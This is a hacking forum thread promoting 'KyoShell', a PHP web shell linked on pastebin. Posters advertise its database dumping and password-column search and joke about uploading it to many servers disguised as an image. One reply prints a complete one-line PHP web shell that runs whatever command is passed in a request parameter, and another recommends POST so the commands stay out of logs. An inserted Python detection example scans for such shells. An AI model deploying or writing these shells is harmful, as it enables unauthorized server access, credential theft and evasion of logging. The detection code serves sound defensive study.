Sla.ckers.org
KyoShell [PHP]
Posted by: Kyo
Date: December 19, 2009 06:58AM

I am fairly positive that once upon a time I have posted a version of my shell here somewhere, but today I've made some extensions to it for my needs that I think someone might find useful. What I have added is the downloading of directories on a server as zip files, given that either exec() or the Zip class works (as means of zipping the actual directory). As always, this is something I created to learn more PHP and then slowly grew into a monster getting features according to my needs, so parts of it may be incomplete, but you will find it is quite handy and comfortable.
The difference to the c99 shell, I would say is that it's more about learning about the system and perhaps changing things, and less about getting access and nuking everything.

But enough talk; here's the code:

http://pastebin.com/ejTsG1M0



Edited 11 time(s). Last edit at 01/11/2011 03:50PM by Kyo.

Re: KyoShell [PHP]
Posted by: barbarianbob
Date: December 19, 2009 03:37PM

This is very nice. Looks like I'll be uploading kyo.php.pjpeg to a bunch of servers in the incoming months. :)

I do have a minor change that I think you missed: error suppressing is missing on the $_REQUEST vars on lines 570-599, which ends up yelling xdebug information on my server.

Re: KyoShell [PHP]
Posted by: Kyo
Date: December 20, 2009 08:35AM

Yeah, I just added that recently and haven't changed everything yet. I'll keep this thread updated (currently also extending the MySQL functionality)

I'm glad you like it!

Edit: Alright, I updated the shell in the first post. It now has a MySQL MiniAdmin function. So far, it allows you to view tables, databases, their contents and drop/empty tables. Editing and inserting you will have to do through the query tool, for now.



Edited 1 time(s). Last edit at 12/20/2009 01:40PM by Kyo.

Re: KyoShell [PHP]
Posted by: Kyo
Date: December 21, 2009 07:46AM

Now with SQL dump function!

Please report any bugs or submit improvement suggestions. Amazingly, the shell is still less than 50kb big!

edit: fixed a bug for the dumping function; adding a password column searching function. In a nutshell, it looks for columns with "pass" or "pw" in the name in all databases, tables



Edited 2 time(s). Last edit at 12/21/2009 09:27AM by Kyo.

Re: KyoShell [PHP]
Posted by: rvdh
Date: December 26, 2009 04:05PM

<html><body bgcolor="#000000">
<form name="h4x" action="" method="GET">
<textarea cols="100" rows="40"><?php $_GET['cmd'] ? system($_GET['cmd']) : system("cd /"); ?></textarea><br />
<input type="text" name="cmd" value="" size="99">
</form>
</body>
</html>



Edited 1 time(s). Last edit at 12/26/2009 04:09PM by rvdh.

Re: KyoShell [PHP]
Posted by: lightos
Date: December 26, 2009 04:55PM

Personally I prefer $_POST to avoid logs.

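For defenders, the two posts above point at one detection problem: a request parameter passed straight into a command-execution function, and the fact that only GET parameters show up in a standard access log. The following is an added example, not part of the thread or of KyoShell; the sample PHP, log lines, paths and function names are constructed for illustration, and the source scan is a line-based heuristic rather than a PHP parser.

```python
import re
from urllib.parse import parse_qs

# PHP built-ins that run OS commands, and request-controlled superglobals.
SINK_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(([^;)]*)")
SOURCE_USE = re.compile(r"\$(_(?:GET|POST|REQUEST|COOKIE))\s*\[\s*['\"]?(\w+)")
# Request line of a common/combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST) [^ ?"]+(?:\?(\S*))? HTTP/')

def scan_php(source):
    """Return (line_no, sink, superglobal, key) for every command-execution
    call whose argument text reads a request superglobal."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for call in SINK_CALL.finditer(line):
            for src in SOURCE_USE.finditer(call.group(2)):
                findings.append((no, call.group(1), "$" + src.group(1), src.group(2)))
    return findings

def logged_params(log_line):
    """Parameter names an access log line exposes. POST bodies are not
    written to the request line, so a POST-driven script returns []."""
    m = REQUEST_LINE.search(log_line)
    if not m or m.group(1) is None:
        return []
    return sorted(parse_qs(m.group(1), keep_blank_values=True))

# Constructed sample inputs (not taken from any real server).
SAMPLE_PHP = """<?php
// constructed sample for the scanner
$out = system($_GET['cmd']);
$rows = exec("ls " . $_POST["dir"], $lines);
$safe = exec("uptime");
"""
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Dec/2009:16:05:00 +0000] "GET /up/x.php?cmd=id HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Dec/2009:16:55:00 +0000] "POST /up/x.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print("source hit:", finding)
    for entry in SAMPLE_LOG:
        print("log params:", logged_params(entry))
```

Because the POST entry exposes no parameters, hunting in access logs alone misses that variant; scanning the web root's files catches both.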
Re: KyoShell [PHP]
Posted by: Kyo
Date: December 29, 2009 10:41AM

What's the difference between system() and exec()? My shell has exec() and I'm not quite clear on what the advantage/difference of using system() is

Re: KyoShell [PHP]
Posted by: Kyo
Date: February 26, 2010 04:42PM

new version

Re: KyoShell [PHP]
Posted by: kevin85
Date: June 08, 2010 01:15PM

Very Useful Thanks

Re: KyoShell [PHP]
Posted by: Kyo
Date: August 18, 2010 07:47AM

Lots of additions this time. Added a tar fallback in case neither a zip class nor library is installed on the server for directory downloading. Fixed some errors depending on the system you run this on here and there.

The biggest update was probably to the MySQL miniadmin. I improved its sql dumping capabilities. You can not edit/delete table entries while browsing them. You can also browse data with more complex queries, rather than just all entries in a table, so you no longer have to use the query maker for that.

Still no insert, though. You'll have to make those queries yourself. I'll add that soon. This version is pretty awesome.

Oh, also I added a password protection thing so you can use it to administrate your own server, if you dare :P. This thing isn't exactly secured against CSRF.



Edited 1 time(s). Last edit at 08/18/2010 07:48AM by Kyo.

Re: KyoShell [PHP]
Posted by: Skyphire
Date: August 20, 2010 12:08PM

@Kyo

Yeah I don't think it's really necessary to protect it, as I would use it only off-line and never on a server if you get my drift.

Re: KyoShell [PHP]
Posted by: Kyo
Date: August 21, 2010 01:02PM

Yeah. Just liked the option. Nobody said you had to employ the password protection on your OWN server, but you might still want to have one in place ;)

Re: KyoShell [PHP]
Posted by: Skyphire
Date: August 23, 2010 11:08AM

Oh wait. My bad I posted this in a totally different thread. I thought it was about that webapp scanner.

Re: KyoShell [PHP]
Posted by: Kyo
Date: January 11, 2011 03:50PM

newest version:

http://pastebin.com/ejTsG1M0

It has unfortunately gotten too big to post it in here.

New features... not sure which version I last posted here, what with the rollback. It definitely has some patches for the mysql dumping, you can now do partial table dumps (specifying limit, order & where), upload files instead of having to touch & post contents (seeing as how some servers have problems with html and similar posted).

Fixed a bug to restore php 4 compatibility. If anything doesn't work, just say.
